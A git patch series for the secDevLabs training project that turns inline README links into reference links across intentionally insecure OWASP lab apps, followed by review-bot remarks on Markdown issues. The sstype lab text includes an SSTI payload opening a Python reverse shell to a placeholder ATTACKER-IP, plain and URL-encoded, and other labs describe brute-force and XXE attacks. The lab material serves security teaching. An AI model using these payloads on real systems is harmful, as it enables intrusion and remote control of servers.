@@ -169,6 +169,9 @@ How could you now mitigate this vulnerability? After your code modification, an We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 + +[secDevLabs]: https://github.com/globocom/secDevLabs [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10001 +[sqlmap]: https://github.com/sqlmapproject/sqlmap \ No newline at end of file From 8d0896c00bd8d9a7521cfdf175bcee996fb51d3f Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:17:59 -0300 Subject: [PATCH 19/31] Update README.md --- owasp-top10-2021-apps/a3/gossip-world/README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a3/gossip-world/README.md b/owasp-top10-2021-apps/a3/gossip-world/README.md index b913a717e..8fb154726 100644 --- a/owasp-top10-2021-apps/a3/gossip-world/README.md +++ b/owasp-top10-2021-apps/a3/gossip-world/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Cross-Site Scripting** vulnerabili ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/gossip-world 
@@ -99,7 +99,7 @@ func handler(c echo.Context) error { } ``` -To run this code simply type the following command in your terminal (you should check this [guide](https://golang.org/doc/install) if you need any help with Golang): +To run this code simply type the following command in your terminal (you should check this [guide][guide] if you need any help with Golang): ```sh go run main.go @@ -145,6 +145,8 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +[guide]: https://golang.org/doc/install [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10007 +[guide]: https://golang.org/doc/install From 2b4d5526ddbd1aa09e004e9620accc9994fcee28 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:19:58 -0300 Subject: [PATCH 20/31] Update README.md --- owasp-top10-2021-apps/a3/mongection/README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a3/mongection/README.md b/owasp-top10-2021-apps/a3/mongection/README.md index 86151cb6e..2e24b7bb3 100644 --- a/owasp-top10-2021-apps/a3/mongection/README.md +++ b/owasp-top10-2021-apps/a3/mongection/README.md 
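Review bot: the `gossip-world/README.md` hunk (@@ -145,6) adds `[guide]: https://golang.org/doc/install` twice, once before `[docker install]` and once after `[app]`; keep one. More importantly, the Setup hunk (@@ -23,7) of this patch switched to `[secDevLabs][secDevLabs]` but no `[secDevLabs]` definition is added anywhere in the patch (the 4 insertions are the two rewritten lines plus the two `[guide]` lines), so that link will render as literal text; add `[secDevLabs]: https://github.com/globocom/secDevLabs` as the other READMEs do.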
@@ -21,7 +21,7 @@ The main goal of this project is to discuss how **NoSQL Injection** vulnerabilit ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/mongection @@ -62,7 +62,7 @@ Now that you know the purpose of this app, what could go wrong? The following se #### Lack of input validation allows injection of NoSQL queries -After reviewing [db.js](https://github.com/globocom/secDevLabs/blob/master/owasp-top10-2021-apps/a3/mongection/src/db.js) file, it was possible to see that some input from users is concatenated with NoSQL queries, as shown in the following code snippets: +After reviewing [db.js][db.js] file, it was possible to see that some input from users is concatenated with NoSQL queries, as shown in the following code snippets: ```js const existUser = await User.findOne({ email: email }); @@ -120,6 +120,8 @@ How could you now mitigate this vulnerability? After your code modification, an We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +[secDevLabs]: https://github.com/globocom/secDevLabs [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10001 +[db.js]: https://github.com/globocom/secDevLabs/blob/master/owasp-top10-2021-apps/a3/mongection/src/db.js \ No newline at end of file From 3f8ddfc4f8aa2cc3432e6c316c01c246c2dce64c Mon Sep 17 00:00:00 2001 
From: FabioHCNobre Date: Wed, 19 Oct 2022 21:21:12 -0300 Subject: [PATCH 21/31] Update README.md --- owasp-top10-2021-apps/a3/sstype/README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a3/sstype/README.md b/owasp-top10-2021-apps/a3/sstype/README.md index db055c58a..ca702d007 100644 --- a/owasp-top10-2021-apps/a3/sstype/README.md +++ b/owasp-top10-2021-apps/a3/sstype/README.md @@ -21,7 +21,7 @@ The main goal of this project is to discuss how **Server-Side Template Injection ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/sstype 
@@ -127,7 +127,7 @@ Don't forget to replace `ATTACKER-IP` and `ATTACKER-PORT` below! {%import os%}{{os.popen("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER-IP\",ATTACKER-PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'").read()}} ``` -However, as there might be some special characters in this string, we need to escape them before injecting it in the vulnerable application (this [online URL encoder](https://www.urlencoder.org/) may help) and hope for a shell: +However, as there might be some special characters in this string, we need to escape them before injecting it in the vulnerable application (this [online URL encoder][online URL encoder] may help) and hope for a shell: ```python %7B%25import%20os%25%7D%7B%7Bos.popen%28%22python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%5C%22ATTACKER-IP%5C%22%2CATTACKER-PORT%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%5C%22%2Fbin%2Fbash%5C%22%2C%5C%22-i%5C%22%5D%29%3B%27%22%29.read%28%29%7D%7D @@ -147,6 +147,8 @@ How could you now mitigate this vulnerability? After your code modification, an We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +[secDevLabs]: https://github.com/globocom/secDevLabs [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10001 +[online URL encoder]: https://www.urlencoder.org/ From 477accf8105582768d8c1140a8ba982b24ac1164 Mon Sep 17 00:00:00 2001 
From: FabioHCNobre Date: Wed, 19 Oct 2022 21:22:29 -0300 Subject: [PATCH 22/31] Update README.md --- owasp-top10-2021-apps/a3/streaming/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a3/streaming/README.md b/owasp-top10-2021-apps/a3/streaming/README.md index a321c47e3..087d26da5 100644 --- a/owasp-top10-2021-apps/a3/streaming/README.md +++ b/owasp-top10-2021-apps/a3/streaming/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Cross-Site Scripting** vulnerabili ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/streaming @@ -106,4 +106,5 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10007 From be0cfa5e152336eec137f1dcfba85c2cef05b040 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:24:27 -0300 Subject: [PATCH 23/31] Update README.md --- owasp-top10-2021-apps/a5/misconfig-wordpress/README.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md b/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md index ace652ed1..c84b9eeb4 100644 --- a/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md +++ b/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md 
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Security Misconfiguration** vulner ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a5/misconfig-wordpress @@ -69,7 +69,7 @@ An attacker could try to log in with the username: `admin` and realize, through ### 🔥 -At this moment, an attacker could use [Burp Suite](https://portswigger.net/burp) to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right click and send to Intruder, as shown below: +At this moment, an attacker could use [Burp Suite][Burp Suite] to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy you should check this [guide][guide]). To do so, after finding the login POST request, right click and send to Intruder, as shown below:

@@ -222,9 +222,12 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:8000 [wordlist]: https://github.com/danielmiessler/SecLists/blob/master/Passwords/UserPassCombo-Jay.txt [wpscan]: https://wpscan.org/ [malicious code]: https://www.exploit-db.com/exploits/44949 [nikto]: https://cirt.net/Nikto2 [searchsploit]: https://www.exploit-db.com/searchsploit +[Burp Suite]: https://portswigger.net/burp +[guide]: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp From 3bcc92454a29ea049306e53c0821cbcb4d393707 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:25:11 -0300 Subject: [PATCH 24/31] Update README.md --- owasp-top10-2021-apps/a5/stegonography/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a5/stegonography/README.md b/owasp-top10-2021-apps/a5/stegonography/README.md index 44e5dd3ae..fdb17dbfc 100644 --- a/owasp-top10-2021-apps/a5/stegonography/README.md +++ b/owasp-top10-2021-apps/a5/stegonography/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Security Misconfiguration** vulner ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a5/stegonography 
@@ -135,7 +135,9 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 + [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10006 [dirb]: https://tools.kali.org/web-applications/dirb From cbee704162bc0a25d4f186843ed39c2afdcca4ba Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:28:14 -0300 Subject: [PATCH 25/31] Update README.md --- owasp-top10-2021-apps/a5/vinijr-blog/README.md | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/owasp-top10-2021-apps/a5/vinijr-blog/README.md b/owasp-top10-2021-apps/a5/vinijr-blog/README.md index 7dde735a1..3bd7291c8 100644 --- a/owasp-top10-2021-apps/a5/vinijr-blog/README.md +++ b/owasp-top10-2021-apps/a5/vinijr-blog/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **XXE** vulnerabilities can be explo ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a5/vinijr-blog 
@@ -54,11 +54,11 @@ After reviewing the inputs from the app, it is possible to identify that the sec -Using [Burp Suite](https://portswigger.net/burp) proxy to intercept this request (POST to contact.php) reveals that the message is being built using an XML (if you need any help setting up your proxy you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)): +Using [Burp Suite][Burp Suite] proxy to intercept this request (POST to contact.php) reveals that the message is being built using an XML (if you need any help setting up your proxy you should check this [guide][guide]: -To replicate this POST using [curl](https://curl.haxx.se/), create the following file `payload.xml`: +To replicate this POST using [curl][curl], create the following file `payload.xml`: ```XML @@ -82,7 +82,7 @@ By checking the source code of the [file](../vinijr-blog/app/contact.php), it is ### 🔥 -As no validation is being used to avoid [ENTITIES](https://www.w3schools.com/xml/xml_dtd_entities.asp) being sent to the PHP file, an attacker could create the following `evilxml.xml` to perform a XXE: +As no validation is being used to avoid [ENTITIES][ENTITIES] being sent to the PHP file, an attacker could create the following `evilxml.xml` to perform a XXE: ```XML @@ -121,4 +121,9 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10004 +[Burp Suite]: https://portswigger.net/burp +[guide]: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp +[curl]: https://curl.haxx.se/ +[ENTITIES]: https://www.w3schools.com/xml/xml_dtd_entities.asp \ No newline at end of file From 6e3db3359c90d4be50ff50d4c86b83b629a77c38 Mon Sep 17 00:00:00 2001 
From: FabioHCNobre Date: Wed, 19 Oct 2022 21:33:36 -0300 Subject: [PATCH 26/31] Update README.md --- owasp-top10-2021-apps/a6/cimentech/README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a6/cimentech/README.md b/owasp-top10-2021-apps/a6/cimentech/README.md index a888c91c9..d19b63045 100644 --- a/owasp-top10-2021-apps/a6/cimentech/README.md +++ b/owasp-top10-2021-apps/a6/cimentech/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Vulnerable and Outdated Components ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a6/cimentech @@ -65,7 +65,7 @@ Having the CMS version, it's possible to check on [exploit-db][3] if there are a -By using [searchsploit](https://www.exploit-db.com/searchsploit), an attacker could also find this same result via a terminal. To install it, simply type the following in your OSX terminal (keep in mind it might trigger your anti-virus software) : +By using [searchsploit][searchsploit], an attacker could also find this same result via a terminal. To install it, simply type the following in your OSX terminal (keep in mind it might trigger your anti-virus software) : ```sh ⚠️ 'The next command will install several exploit codes in your system and many of them may trigger antiviruses alerts' 
@@ -125,6 +125,8 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs +[searchsploit]: https://www.exploit-db.com/searchsploit [app]: http://localhost:80 [secdevlabs]: https://github.com/globocom/secDevLabs [1]: https://www.ruby-lang.org/en/documentation/installation/ From 01d3b602b355f0d6eb73a31d64c11fc0b0db6bf7 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:35:38 -0300 Subject: [PATCH 27/31] Update README.md --- owasp-top10-2021-apps/a6/golden-hat/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a6/golden-hat/README.md b/owasp-top10-2021-apps/a6/golden-hat/README.md index 4b66e20c9..8ad8ef917 100644 --- a/owasp-top10-2021-apps/a6/golden-hat/README.md +++ b/owasp-top10-2021-apps/a6/golden-hat/README.md @@ -67,7 +67,7 @@ Once we try reaching the `/golden.secret` we can see interesting headers: As we can see this `Via: mitmproxy/5.3.0` helps us with the recon. Now that we know what is running on the server we can search for CVEs on this version of mitmproxy. Once we found the CVE-2021-39214, we can make an exploit to this vulnerability. -Let's take a look on the mitmproxy source code, [TAG 5.3.0](https://github.com/mitmproxy/mitmproxy/tree/v5.3.0) at file [/mitmproxy/net/http/http1/read.py:L209](https://github.com/mitmproxy/mitmproxy/blob/a738b335a36b58f2b30741d76d9fe41866309299/mitmproxy/net/http/http1/read.py#L209): +Let's take a look on the mitmproxy source code, [TAG 5.3.0][TAG 5.3.0] at file [/mitmproxy/net/http/http1/read.py:L209][/mitmproxy/net/http/http1/read.py:L209]: ```python if "chunked" in headers.get("transfer-encoding", "").lower(): 
@@ -122,3 +122,5 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10006 +[TAG 5.3.0]: https://github.com/mitmproxy/mitmproxy/tree/v5.3.0 +[/mitmproxy/net/http/http1/read.py:L209]: https://github.com/mitmproxy/mitmproxy/blob/a738b335a36b58f2b30741d76d9fe41866309299/mitmproxy/net/http/http1/read.py#L209 From 49b77a05cb136aea6b7b98015b33edc6181bb913 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:36:19 -0300 Subject: [PATCH 28/31] Update README.md --- owasp-top10-2021-apps/a7/insecure-go-project/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a7/insecure-go-project/README.md b/owasp-top10-2021-apps/a7/insecure-go-project/README.md index 49c200e69..dca300447 100644 --- a/owasp-top10-2021-apps/a7/insecure-go-project/README.md +++ b/owasp-top10-2021-apps/a7/insecure-go-project/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Identity and Authentication Failur ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a7/insecure-go-project @@ -79,5 +79,6 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10002 [dirb]: https://tools.kali.org/web-applications/dirb 
From ef1b427b6d3838d1244ee9da7edeabe8aa22f450 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:37:00 -0300 Subject: [PATCH 29/31] Update README.md --- owasp-top10-2021-apps/a7/saidajaula-monster/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a7/saidajaula-monster/README.md b/owasp-top10-2021-apps/a7/saidajaula-monster/README.md index 4240f4b48..ac8d379d1 100644 --- a/owasp-top10-2021-apps/a7/saidajaula-monster/README.md +++ b/owasp-top10-2021-apps/a7/saidajaula-monster/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Identity and Authentication Failur ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a7/saidajaula-monster @@ -140,5 +140,6 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10002 [dirb]: https://tools.kali.org/web-applications/dirb From 07a72d1584f287b307144f38874f28271238e22a Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:37:50 -0300 Subject: [PATCH 30/31] Update README.md --- owasp-top10-2021-apps/a8/amarelo-designs/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a8/amarelo-designs/README.md b/owasp-top10-2021-apps/a8/amarelo-designs/README.md index cbacc5052..f4fa20615 100644 
--- a/owasp-top10-2021-apps/a8/amarelo-designs/README.md +++ b/owasp-top10-2021-apps/a8/amarelo-designs/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Software and Data Integrity Failur ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a8/amarelo-designs @@ -163,6 +163,7 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10008 [secdevlabs]: https://github.com/globocom/secDevLabs [2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a8/amarelo-designs From ecdfb3fe9f51747fa492fbfab9f313f544c63b67 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:39:30 -0300 Subject: [PATCH 31/31] Update README.md --- owasp-top10-2021-apps/a9/games-irados/README.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a9/games-irados/README.md b/owasp-top10-2021-apps/a9/games-irados/README.md index dbef5d09a..e049cdfd9 100644 --- a/owasp-top10-2021-apps/a9/games-irados/README.md +++ b/owasp-top10-2021-apps/a9/games-irados/README.md 
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Security Logging and Monitoring Fa ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a9/games-irados @@ -64,7 +64,7 @@ Initially, we begin the first attack by sending an intentionally wrong login att ## 🔥 -After that, an attacker could use [Burp Suite] as a proxy to send as many requests as needed until a valid password is found (if you need any help setting up your proxy, you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right click and send to `Intruder`, as shown below: +After that, an attacker could use [Burp Suite] as a proxy to send as many requests as needed until a valid password is found (if you need any help setting up your proxy, you should check this [guide][guide]). To do so, after finding the login POST request, right click and send to `Intruder`, as shown below:

@@ -170,7 +170,10 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10010 [secdevlabs]: https://github.com/globocom/secDevLabs [2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados [burp suite]: https://portswigger.net/burp +[guide]: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp +
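Review bot: in the first hunk on this page (the `@@ -169,6 +169,9 @@` hunk that adds `[sqlmap]: https://github.com/sqlmapproject/sqlmap`), the new last line is written without a trailing newline, hence the `\ No newline at end of file` marker; end the file with a newline so later diffs of the reference list stay clean.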
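Review bot: `[guide]: https://golang.org/doc/install` is defined twice in the `@@ -145,6 +145,8 @@` hunk of `owasp-top10-2021-apps/a3/gossip-world/README.md`, once above `[docker install]` and again below `[app]`. Markdown resolves a label to its first definition, so the second copy is dead text that linters will flag; keep only one of the two added lines.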
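Review bot: the `@@ -120,6 +120,8 @@` hunk of `owasp-top10-2021-apps/a3/mongection/README.md` has the same missing trailing newline after the new `[db.js]` definition as the `[sqlmap]` hunk above; add the newline when touching this file.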
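Review bot: the rewritten sentence in the `@@ -54,11 +54,11 @@` hunk of `owasp-top10-2021-apps/a5/vinijr-blog/README.md` drops the closing parenthesis. The removed line ended `this [guide](https://...)):` while the added line ends `this [guide][guide]:`; it should read `this [guide][guide]):` so the parenthetical opened by `(if you need any help` is closed.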
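Review bot: the `@@ -121,4 +121,9 @@` hunk of `owasp-top10-2021-apps/a5/vinijr-blog/README.md` also leaves the file without a trailing newline after the new `[ENTITIES]` definition; add one.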
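Review bot: the label `[/mitmproxy/net/http/http1/read.py:L209]` added in `owasp-top10-2021-apps/a6/golden-hat/README.md` (`@@ -67,7 +67,7 @@` and `@@ -122,3 +122,5 @@`) is valid CommonMark but unwieldy and easy to mistype; a short label such as `[read.py L209]` used in both the link and the definition would read better. `[TAG 5.3.0]` is fine as is.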
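Review bot: in the `@@ -125,6 +125,8 @@` hunk of `owasp-top10-2021-apps/a6/cimentech/README.md`, the added `[secDevLabs]: https://github.com/globocom/secDevLabs` duplicates the existing context line `[secdevlabs]: https://github.com/globocom/secDevLabs`. Markdown reference labels are matched case-insensitively, so both definitions name the same label and the first one wins; either drop the new line or remove the old lowercase definition so the file has a single definition.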
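Review bot: the `@@ -163,6 +163,7 @@` hunk of `owasp-top10-2021-apps/a8/amarelo-designs/README.md` has the same case-insensitive duplicate: `[secDevLabs]` is added while `[secdevlabs]: https://github.com/globocom/secDevLabs` already follows two lines later. Keep one definition.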
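Review bot: two points on the `@@ -170,7 +170,10 @@` hunk of `owasp-top10-2021-apps/a9/games-irados/README.md`. First, `[secDevLabs]` is added above an existing `[secdevlabs]: https://github.com/globocom/secDevLabs`, which is the same label under case-insensitive matching; one of the two should go. Second, the final `+` adds an empty line at the end of the file; drop it so the file ends right after the `[guide]` definition.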